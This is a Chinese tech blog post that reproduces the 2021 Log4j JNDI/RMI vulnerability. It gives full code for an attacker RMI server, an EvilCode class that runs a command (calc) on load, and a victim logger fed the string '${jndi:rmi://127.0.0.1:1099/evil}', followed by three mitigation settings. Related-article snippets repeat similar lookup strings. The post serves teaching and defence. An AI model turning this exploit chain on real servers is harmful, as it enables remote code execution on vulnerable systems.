java~RMI引起的log4j漏洞

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量375 收藏
点赞数
文章标签: java 程序人生 spring struts 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/V539413949/article/details/124446155
版权

2021-12-10日左右,java的log4j框架出现了一个大漏洞,对服务器案例引起了不小的影响,当然只对于log4j的日志使用者来说,如果你是spring框架,用的是logback,不存在这个问题。
RMI和JNDI

RMI(Remote Method Invocation) 即Java远程方法调用,一种用于实现远程过程调用的应用程序编程接口
JNDI (Java Naming and Directory Interface)是一个应用程序设计的API,为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口
JNDI和RMI的主要关系是RMI注册的服务可以通过JNDIAPI访问。在讨论到Spring反序列化漏洞之前,先看看如果通过JNDI来调用RMI注册的服务。

模拟漏洞重现

pom依赖

<dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
        <exclusions>
            <exclusion>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-logging</artifactId>
            </exclusion>
        </exclusions>
    </dependency>

    <!--log4j2核心包-->
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.14.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.0</version>
    </dependency>

黑客端

/**
 * 构建RMI服务来响应恶意代码
 * <p>
 * Java RMI,即 远程方法调用(Remote Method Invocation),一种用于实现远程过程调用(RPC)的Java API, 能直接传输序列化后的Java对象和分布式垃圾收集。它的实现依赖于(JVM),因此它仅支持从一个JVM到另一个JVM的调用。
 */
public class RMIServer {
  @SneakyThrows
  public static void main(String... args) {
    try {
      // 本地主机上的远程对象注册表Registry的实例,默认端口1099
      LocateRegistry.createRegistry(1099);
      Registry registry = LocateRegistry.getRegistry();
      System.out.println("Create RMI registry on port 1099");
      //返回的Java对象
      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
      // 把远程对象注册到RMI注册服务器上,并命名为evil
      registry.bind("evil", referenceWrapper);
    } catch (RemoteException | AlreadyBoundException | NamingException e) {
      e.printStackTrace();
    }
  }

/**
 * 执行任意的脚本,目前的脚本会使windows服务器打开计算器.
 */
public class EvilCode {
  static {
    System.out.println("受害服务器将执行下面命令行");
    Process p;

    String[] cmd = {"calc"};
    try {
      p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null) {
        System.out.println(line);
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

网站端

public class Server {
  private static final Logger logger = LogManager.getLogger();

  public static void main(String[] args) {
    String name = "${java:runtime}";
    logger.info("name:{}", name);
    //模拟填写数据,输入构造好的字符串,使受害服务器打印日志时执行远程的代码 同一台可以使用127.0.0.1
    String username = "${jndi:rmi://127.0.0.1:1099/evil}";
    //正常打印业务日志
    logger.error("username:{}", username);

  }
}

【紧急补救措施3选1】

修改 JVM 参数 -Dlog4j2.formatMsgNoLookups=true
修改配置 log4j2.formatMsgNoLookups=True
将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

愿与诸君共进步,大量的面试题及答案还有资深架构师录制的视频录像:有Spring,MyBatis,Netty源码分析,高并发、高性能、分布式、微服务架构的原理,JVM性能优化、分布式架构等这些成为架构师必备的知识体系,可以微信搜索539413949获取,最后祝大家都能拿到自己心仪的offer

Lydia Bess
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RMI、JNDI、LDAP介绍+log4j漏洞分析
HBohan的博客
02-28 2299
本篇主要介绍javaRMI、JNDI、LDAP,在后面会详细分析log4j的jndi注入原理。
Log4j漏洞分析
a1290320893的博客
12-13 2617
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
JNDI RMI 注入(Log4j2漏洞
sun0322
12-24 8476
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7921
log4j漏洞原理和靶场复现
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 1290
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
log4j漏洞原理分析&复现&检测&复盘
qq_43665434的博客
08-22 2905
log4j漏洞原理分析&复现&检测&复盘
【紧急】Log4j又发新版2.17.0,只有彻底搞懂漏洞原因,才能以不变应万变
Tom弹架构
12-20 1917
1 事件背景 经过一周时间的Log4j2 RCE事件的发酵,事情也变也越来越复杂和有趣,就连 Log4j 官方紧急发布了 2.15.0 版本之后没有过多久,又发声明说 2.15.0 版本也没有完全解决问题,然后进而继续发布了 2.16.0 版本。大家都以为2.16.0是最终终结版本了,没想到才过多久又爆雷,Log4j 2.17.0横空出世。 相信各位小伙伴都在加班加点熬夜紧急修复和改正Apache Log4j爆出的安全漏洞,各企业都瑟瑟发抖,连网警都通知各位站长,包括我也收到了湖南长沙高新区网警的通知。
Log4j rmi 漏洞测试
北尘
12-15 4562
晚上抽了个空,也来玩玩这个漏洞,步骤如下; 1.创建RMI服务 public class RmiServer { private static final Logger log = LogManager.getLogger(); public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { Registry registry
log4j远程执行漏洞,测试源码
12-22
2021年12月,研究人员发现了一个允许任意代码执行的严重漏洞,它存在于Log4j 2的JNDI(Java Naming and Directory Interface)查找功能中。攻击者只需要在日志消息中插入特定的恶意格式字符串,就能触发远程代码执行...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 是一个广泛使用的Java日志框架,它为开发者提供了强大的日志记录功能。然而,在2021年12月初,一个严重的安全漏洞(CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的...
log4j-2.15.0-rc2.zip
12-11
此次我们关注的是一个针对Java日志库Log4j的重大安全问题,即著名的“Log4Shell”漏洞。这个漏洞(CVE-2021-44228)允许攻击者通过恶意构建的日志输入进行远程代码执行,对系统安全构成严重威胁。为应对这一危机,...
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4jLog4j2和Fastjson的安全性问题在过去曾引起广泛关注,例如Log4j2的CVE-2021-44228(也被称为Log4Shell漏洞),这是一个远程代码执行漏洞,影响了许多使用Log4j2的系统。这个插件可能就是为了检测和利用这些...
Log4J2远程代码执行漏洞修复20211210.rar
12-13
在IT安全领域,Log4J2的远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的日志消息来执行任意代码,从而对系统...
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java日志框架Apache Log4j2,可能导致远程代码执行(RCE)的风险,让攻击者有机会完全控制受影响的系统。本文将深入探讨Log4j2漏洞的原理、影响范围以及如何进行...
log4j确认修复工具及源码
01-22
然而,2021年底,Log4j2被发现存在一个严重的安全漏洞,被称为CVE-2021-44228,也就是著名的"Log4Shell"漏洞。这个漏洞允许远程攻击者通过注入恶意代码来执行任意系统命令,对网络安全构成了重大威胁。 "Log4j确认...
apache-log4j-2.15.0-src.tar.gz
12-16
这个漏洞是由于Log4j的JNDI(Java Naming and Directory Interface)特性被恶意利用,攻击者可以通过在日志语句中插入恶意的LDAP或RMI URL,导致远程代码执行。这个漏洞的影响范围广泛,因为许多Java应用都使用了Log...
Log4j漏洞及解决方案,亲测
热门推荐
weixin_42492886的博客
12-14 1万+
log4j漏洞解决方案,亲测
信息安全-史诗级漏洞Log4j漏洞机理和防范措施
码者人生的技术博客
12-31 6120
信息安全-史诗级漏洞Log4j漏洞机理和防范措施及对安全能力建设的思考
log4j关于JNDI注入漏洞验证及修复
影子的博客
12-11 7636
log4j关于JNDI注入漏洞验证及修复一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞复现八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
Log4j2安全漏洞复现及解决
Log4j2中的这个特定漏洞与JNDI(Java Naming and Directory Interface)有关。JNDI是一个Java API,用于查找和访问不同类型的命名和目录服务。在Log4j2中,如果日志消息包含特定的JNDI LDAP(轻量级目录访问协议)或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值